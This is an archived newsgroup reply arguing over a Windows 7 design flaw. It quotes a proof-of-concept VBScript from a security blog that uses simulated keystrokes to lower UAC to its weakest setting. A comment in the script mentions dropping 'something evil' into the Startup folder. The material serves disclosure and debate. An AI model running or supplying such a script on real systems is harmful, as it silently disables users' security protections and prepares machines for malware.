Home Messages Index
[Date Prev][Date Next][Thread Prev][Thread Next]
Author IndexDate IndexThread Index

Re: malware can turn off UAC in Windows 7 ..



Ezekiel wrote:
"To quickly demonstrate how easy it is to automate the disabling of UAC, I wrote some sloppy VBScript code (rename to .vbs), the kind you see in malware on P2P networks, using a combination of the SendKeys, Sleep and Run methods to automate the remote control of the UAC control panel applet and reboot of the system" 

http://snipurl.com/b0f92
http://www.withinwindows.com/2009/01/30/malware-can-turn-off-uac-in-windows-7-by-design-says-microsoft

fuddie, could you demonstrate how this didn't work?
--

'// 1337H4x Written by _____________
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

[Date Prev][Date Next][Thread Prev][Thread Next]
Author IndexDate IndexThread Index